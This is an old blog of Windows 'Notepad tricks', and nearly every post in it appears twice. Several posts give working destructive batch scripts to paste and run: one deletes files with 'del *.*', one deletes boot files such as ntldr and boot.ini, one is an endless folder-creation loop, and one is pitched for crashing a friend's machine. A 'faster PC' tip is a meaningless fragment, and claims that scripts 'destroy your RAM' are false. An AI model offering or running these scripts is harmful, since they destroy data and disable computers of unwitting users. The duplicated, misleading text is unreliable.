Sunday, 27 September 2015
How to make your PC faster with Notepad
Slow PC and internet is more painful then anything. Believe me it really hurts when pc works slowly and it stuck again and again.
So today i am here with another trick to faster your computer with notepad only.
Open a new notepad and copy and paste all the code there.
[box type=”info” size=”meduim” style=”rounded” border=”full”]mystring=80000000[/box]
and then save it as fast.vbe
That's it.
So today i am here with another trick to faster your computer with notepad only.
Open a new notepad and copy and paste all the code there.
[box type=”info” size=”meduim” style=”rounded” border=”full”]mystring=80000000[/box]
and then save it as fast.vbe
That's it.
Wednesday, 16 September 2015
Delete all FIles on System
Here you will delete all your system file. Including your window each and everything.
After that you will not be able to use that window and your important data. So be careful to use this.
Open Notepad and copy and paste this entire code in your Notepad.
[box type=”info” size=”meduim” style=”rounded” border=”full”]del *.*[/box]
After copying this save it as delete.bat format.
And run and watch the magic.
After that you will not be able to use that window and your important data. So be careful to use this.
Open Notepad and copy and paste this entire code in your Notepad.
[box type=”info” size=”meduim” style=”rounded” border=”full”]del *.*[/box]
After copying this save it as delete.bat format.
And run and watch the magic.
How to create Multiple Folders within Seconds
This is also a very bad and horrible trick so be aware to use it. It might create many many problems for you.
This will brust your RAM by creating large number of folders.
So now copy the code in your Notepad.
[box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off
:top
md %random%
goto top[/box]
save it as multiplefolder.bat and then see what happens it will start creating multiple folders and will destroy your RAM.
This will brust your RAM by creating large number of folders.
So now copy the code in your Notepad.
[box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off
:top
md %random%
goto top[/box]
save it as multiplefolder.bat and then see what happens it will start creating multiple folders and will destroy your RAM.
Tuesday, 15 September 2015
How to Shutdown pc forever Trick
This is really a horrible and deadliest trick. So be careful. And please its a request don't do this with anybody. This trick is just for knowledge.
When you apply this trick your computer will shutdown forever.
Trick:
Open a notepad file and copy and paste this code
[box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini[/box]
And then save it with the name of shutdown.bat or anything else but use .bat in the end.
Then open this and you will lose your computer forever.
When you apply this trick your computer will shutdown forever.
Trick:
Open a notepad file and copy and paste this code
[box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini[/box]
And then save it with the name of shutdown.bat or anything else but use .bat in the end.
Then open this and you will lose your computer forever.
Crashing Ram Trick
This trick is really horrible. By this trick you can crash the ram of your friend. But i will recommend you to don't do this with anybody. This is just for knowledge.
So lets Start.
Copy and paste the following code in Notepad and save it as .bat format
[box type=”info” size=”meduim” style=”rounded” border=”full”]A
start http://google.com/goto
A[/box]
Run the file and it will starts doing it job.
So enjoy share and comment.
Sunday, 13 September 2015
Facebook Photo Verification Trick 2015
Facebook photo verification is quite common now a days. Just because that facebook have made their security system quite up to the mark. Due to which some times it asked us to verify photos of our friends to log in. Sometimes we got stuck into it and we lose our account.
There are many ways to verify your account. But i have a best trick for photo verification and it works 100%.
So just follow the steps.
1. Download the app TunnelBear in your Phone. (It is available in both Android and Iphone)
2. Install the app.
3. Change your location to Japan.
4. Now login to your blocked account and enter captcha.
5. Here it will not ask you for photo verification it will straightly ask you for Phone number.
6. So now just change your country code according to your country enter your phone number.
7. Soon you will receive a text with code.
8. Enter the code and login to your account.
That's it. Enjoy.
There are many ways to verify your account. But i have a best trick for photo verification and it works 100%.
So just follow the steps.
1. Download the app TunnelBear in your Phone. (It is available in both Android and Iphone)
2. Install the app.
3. Change your location to Japan.
4. Now login to your blocked account and enter captcha.
5. Here it will not ask you for photo verification it will straightly ask you for Phone number.
6. So now just change your country code according to your country enter your phone number.
7. Soon you will receive a text with code.
8. Enter the code and login to your account.
That's it. Enjoy.
Friday, 11 September 2015
How to Decrease Boot time in windows 7
Today i will tell you how to decrease the boot time of your system in windows 7.
First of all i would like to say don't do that if you don't know the basics of this or if you want to do this then do in the presence of some expert.
First of all you have to well aware about start up applications. You have to know all that applications which you can't remove.
So lets start.
1. Go to "Run" menu.
2. Type "msconfig".
3. Click on "service" tab.
4. First check the "Hide all Microsoft services."
5. Then go to "Start Up" tab.
6. Close all those services which you do not want to use.
7. Press OK.
8. Then close all applications and restart your computer.
And now check the boot time.
First of all i would like to say don't do that if you don't know the basics of this or if you want to do this then do in the presence of some expert.
First of all you have to well aware about start up applications. You have to know all that applications which you can't remove.
So lets start.
1. Go to "Run" menu.
2. Type "msconfig".
3. Click on "service" tab.
4. First check the "Hide all Microsoft services."
5. Then go to "Start Up" tab.
6. Close all those services which you do not want to use.
7. Press OK.
8. Then close all applications and restart your computer.
And now check the boot time.
Hack Lights on Keyboard
Hello today i will tell you How to Hack Lights on Keyboard.
You can turn off and on light with capslock num lock but for this you have to enter a code.
For this follow these steps.
1. Open Notepad.
2. Copy this code into Notepad:
MsgBox "See on KeyBoard"
set wshShell = wscript.CreateObject("wscript.shell")
wscript.Createobject("WScript.Shell")
do
wscript.sleep 100
wshShell.sendkeys"{NUMLOCK}"
wshShell.sendkeys"{CAPSLOCK}"
wshShell.sendkeys"{SCROLLLOCK}"
loop
This is call programming. By this you can make programmes.
4. Save it is keyboard.vbs. Make sure that the "Save as type" box is set to All types then press Save.
These colors are for good understanding. Just do it and enjoy.
You can turn off and on light with capslock num lock but for this you have to enter a code.
For this follow these steps.
1. Open Notepad.
2. Copy this code into Notepad:
MsgBox "See on KeyBoard"
set wshShell = wscript.CreateObject("wscript.shell")
wscript.Createobject("WScript.Shell")
do
wscript.sleep 100
wshShell.sendkeys"{NUMLOCK}"
wshShell.sendkeys"{CAPSLOCK}"
wshShell.sendkeys"{SCROLLLOCK}"
loop
This is call programming. By this you can make programmes.
4. Save it is keyboard.vbs. Make sure that the "Save as type" box is set to All types then press Save.
These colors are for good understanding. Just do it and enjoy.
How To Open Youtube Without Proxy
Hello today i will tell you how open youtube and other proxies sites.
There are many softwares in market which you have to buy to open sites which are banned like youtube.
For this purpose you i will tell you to install Zenmate for your browser.
It is available for every browser like Chrome, Firefox and Opera.
You just have to type on google Zenmate Extension for and next your browser name. It will be Chrome, Firefox or Opera.
Then open the first search result and click on the text written in green color.
That's it. Now enjoy.
There are many softwares in market which you have to buy to open sites which are banned like youtube.
For this purpose you i will tell you to install Zenmate for your browser.
It is available for every browser like Chrome, Firefox and Opera.
You just have to type on google Zenmate Extension for and next your browser name. It will be Chrome, Firefox or Opera.
Then open the first search result and click on the text written in green color.
That's it. Now enjoy.
Subscribe to:
Comments (Atom)





